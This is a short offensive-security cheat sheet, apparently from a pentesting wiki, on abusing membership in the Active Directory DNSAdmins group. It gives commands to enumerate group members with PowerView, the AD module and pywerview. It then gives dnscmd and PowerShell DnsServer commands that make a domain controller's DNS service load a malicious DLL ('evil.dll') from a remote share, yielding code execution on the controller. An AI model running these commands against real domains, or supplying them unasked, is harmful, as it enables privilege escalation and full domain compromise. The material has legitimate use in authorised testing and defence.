DNS Administrators
Attacking DNS Admins
Enumerate DNS Admins
# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
#Ad Module
Get-ADGroupMember -Identity "DNSAdmins"# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"Exploitation
# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll
# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -VerboseLast updated